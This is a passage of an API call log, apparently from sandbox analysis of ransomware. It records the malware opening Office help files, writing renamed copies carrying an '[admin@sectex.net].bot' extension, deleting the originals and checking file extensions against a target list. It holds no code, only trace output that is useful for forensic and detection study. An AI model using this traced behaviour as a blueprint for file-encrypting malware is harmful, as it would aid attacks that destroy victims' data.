	[0147.746] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.746] GetLastError () returned 0x0
	[0147.746] ReadFile (in: hFile=0x3c8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x71, lpOverlapped=0x0) returned 1
	[0147.814] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0147.815] ReadFile (in: hFile=0x3c8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.815] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0147.815] SetEndOfFile (hFile=0x3bc) returned 1
	[0147.815] CloseHandle (hObject=0x3bc) returned 1
	[0147.815] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.815] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.818] CloseHandle (hObject=0x3c8) returned 1
	[0147.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.869] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_k_col.hxk")) returned 1
	[0147.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.869] lstrlenW (lpString=".doc") returned 4
	[0147.869] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.870] lstrlenW (lpString=".docx") returned 5
	[0147.870] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.870] lstrlenW (lpString=".pdf") returned 4
	[0147.870] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.870] lstrlenW (lpString=".xls") returned 4
	[0147.870] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.870] lstrlenW (lpString=".xlsx") returned 5
	[0147.870] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.870] lstrlenW (lpString=".ppt") returned 4
	[0147.870] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.870] lstrlenW (lpString=".zip") returned 4
	[0147.870] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.870] lstrlenW (lpString=".rar") returned 4
	[0147.870] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.870] lstrlenW (lpString=".bz2") returned 4
	[0147.870] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.870] lstrlenW (lpString=".7z") returned 3
	[0147.870] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.870] lstrlenW (lpString=".dbf") returned 4
	[0147.870] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.870] lstrlenW (lpString=".1cd") returned 4
	[0147.870] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.870] lstrlenW (lpString=".jpg") returned 4
	[0147.870] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.871] lstrlenW (lpString=".doc") returned 4
	[0147.871] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0147.871] lstrlenW (lpString=".docx") returned 5
	[0147.871] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0147.871] lstrlenW (lpString=".pdf") returned 4
	[0147.871] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0147.871] lstrlenW (lpString=".xls") returned 4
	[0147.871] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0147.871] lstrlenW (lpString=".xlsx") returned 5
	[0147.871] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0147.871] lstrlenW (lpString=".ppt") returned 4
	[0147.871] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0147.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.871] lstrlenW (lpString=".zip") returned 4
	[0147.871] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0147.871] lstrlenW (lpString=".rar") returned 4
	[0147.871] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0147.871] lstrlenW (lpString=".bz2") returned 4
	[0147.871] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0147.871] lstrlenW (lpString=".7z") returned 3
	[0147.871] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0147.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.871] lstrlenW (lpString=".dbf") returned 4
	[0147.871] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0147.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.871] lstrlenW (lpString=".1cd") returned 4
	[0147.871] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0147.871] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK") returned 66
	[0147.871] lstrlenW (lpString=".jpg") returned 4
	[0147.871] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0147.872] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0147.872] lstrlenW (lpString="MSOUC.HXS") returned 9
	[0147.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.872] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=431456) returned 1
	[0147.872] CloseHandle (hObject=0x38c) returned 1
	[0147.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc.hxs")) returned 0x20
	[0147.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.873] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.873] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc.hxs.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0147.873] GetLastError () returned 0x0
	[0147.873] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x69560, lpOverlapped=0x0) returned 1
	[0147.913] WriteFile (in: hFile=0x3c4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x69570, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x69570, lpOverlapped=0x0) returned 1
	[0147.921] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.921] WriteFile (in: hFile=0x3c4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0147.921] SetEndOfFile (hFile=0x3c4) returned 1
	[0147.921] CloseHandle (hObject=0x3c4) returned 1
	[0147.921] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.921] SetEndOfFile (hFile=0x38c) returned 1
	[0147.931] CloseHandle (hObject=0x38c) returned 1
	[0147.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc.hxs")) returned 1
	[0147.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.932] lstrlenW (lpString=".doc") returned 4
	[0147.932] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.932] lstrlenW (lpString=".docx") returned 5
	[0147.932] lstrcmpiW (lpString1=".docx", lpString2="C.HXS") returned -1
	[0147.932] lstrlenW (lpString=".pdf") returned 4
	[0147.932] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.932] lstrlenW (lpString=".xls") returned 4
	[0147.932] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.932] lstrlenW (lpString=".xlsx") returned 5
	[0147.932] lstrcmpiW (lpString1=".xlsx", lpString2="C.HXS") returned -1
	[0147.932] lstrlenW (lpString=".ppt") returned 4
	[0147.932] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.932] lstrlenW (lpString=".zip") returned 4
	[0147.932] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.932] lstrlenW (lpString=".rar") returned 4
	[0147.932] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.932] lstrlenW (lpString=".bz2") returned 4
	[0147.932] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.932] lstrlenW (lpString=".7z") returned 3
	[0147.932] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.933] lstrlenW (lpString=".dbf") returned 4
	[0147.933] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.933] lstrlenW (lpString=".1cd") returned 4
	[0147.933] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.933] lstrlenW (lpString=".jpg") returned 4
	[0147.933] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.933] lstrlenW (lpString=".doc") returned 4
	[0147.933] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0147.933] lstrlenW (lpString=".docx") returned 5
	[0147.933] lstrcmpiW (lpString1=".docx", lpString2="C.HXS") returned -1
	[0147.933] lstrlenW (lpString=".pdf") returned 4
	[0147.933] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0147.933] lstrlenW (lpString=".xls") returned 4
	[0147.933] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0147.933] lstrlenW (lpString=".xlsx") returned 5
	[0147.933] lstrcmpiW (lpString1=".xlsx", lpString2="C.HXS") returned -1
	[0147.933] lstrlenW (lpString=".ppt") returned 4
	[0147.933] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0147.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.933] lstrlenW (lpString=".zip") returned 4
	[0147.933] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0147.933] lstrlenW (lpString=".rar") returned 4
	[0147.933] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0147.933] lstrlenW (lpString=".bz2") returned 4
	[0147.933] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0147.934] lstrlenW (lpString=".7z") returned 3
	[0147.934] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0147.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.934] lstrlenW (lpString=".dbf") returned 4
	[0147.934] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0147.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.934] lstrlenW (lpString=".1cd") returned 4
	[0147.934] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0147.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS") returned 57
	[0147.934] lstrlenW (lpString=".jpg") returned 4
	[0147.934] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0147.934] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0147.934] lstrlenW (lpString="MSOUC_COL.HXT") returned 13
	[0147.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.935] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=205) returned 1
	[0147.935] CloseHandle (hObject=0x38c) returned 1
	[0147.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt")) returned 0x20
	[0147.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.935] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.935] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0147.936] GetLastError () returned 0x0
	[0147.936] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xcd, lpOverlapped=0x0) returned 1
	[0147.989] WriteFile (in: hFile=0x3c4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0147.994] ReadFile (in: hFile=0x38c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.994] WriteFile (in: hFile=0x3c4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0147.994] SetEndOfFile (hFile=0x3c4) returned 1
	[0147.994] CloseHandle (hObject=0x3c4) returned 1
	[0147.994] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.994] SetEndOfFile (hFile=0x38c) returned 1
	[0148.160] CloseHandle (hObject=0x38c) returned 1
	[0148.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.161] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxt")) returned 1
	[0148.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.162] lstrlenW (lpString=".doc") returned 4
	[0148.162] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.162] lstrlenW (lpString=".docx") returned 5
	[0148.162] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.162] lstrlenW (lpString=".pdf") returned 4
	[0148.162] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.162] lstrlenW (lpString=".xls") returned 4
	[0148.162] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.162] lstrlenW (lpString=".xlsx") returned 5
	[0148.162] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.162] lstrlenW (lpString=".ppt") returned 4
	[0148.162] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.163] lstrlenW (lpString=".zip") returned 4
	[0148.163] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.163] lstrlenW (lpString=".rar") returned 4
	[0148.163] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.163] lstrlenW (lpString=".bz2") returned 4
	[0148.163] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.163] lstrlenW (lpString=".7z") returned 3
	[0148.163] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.163] lstrlenW (lpString=".dbf") returned 4
	[0148.163] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.163] lstrlenW (lpString=".1cd") returned 4
	[0148.163] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.163] lstrlenW (lpString=".jpg") returned 4
	[0148.163] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.163] lstrlenW (lpString=".doc") returned 4
	[0148.163] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0148.163] lstrlenW (lpString=".docx") returned 5
	[0148.163] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0148.163] lstrlenW (lpString=".pdf") returned 4
	[0148.163] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0148.163] lstrlenW (lpString=".xls") returned 4
	[0148.163] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0148.163] lstrlenW (lpString=".xlsx") returned 5
	[0148.163] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0148.164] lstrlenW (lpString=".ppt") returned 4
	[0148.164] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0148.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.164] lstrlenW (lpString=".zip") returned 4
	[0148.164] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0148.164] lstrlenW (lpString=".rar") returned 4
	[0148.164] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0148.164] lstrlenW (lpString=".bz2") returned 4
	[0148.164] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0148.164] lstrlenW (lpString=".7z") returned 3
	[0148.164] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0148.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.164] lstrlenW (lpString=".dbf") returned 4
	[0148.164] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0148.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.164] lstrlenW (lpString=".1cd") returned 4
	[0148.164] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0148.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXT") returned 61
	[0148.164] lstrlenW (lpString=".jpg") returned 4
	[0148.164] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0148.164] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0148.164] lstrlenW (lpString="MSPUB_COL.HXC") returned 13
	[0148.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0148.165] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=621) returned 1
	[0148.165] CloseHandle (hObject=0x38c) returned 1
	[0148.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxc")) returned 0x20
	[0148.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0148.165] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.165] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.166] GetLastError () returned 0x0
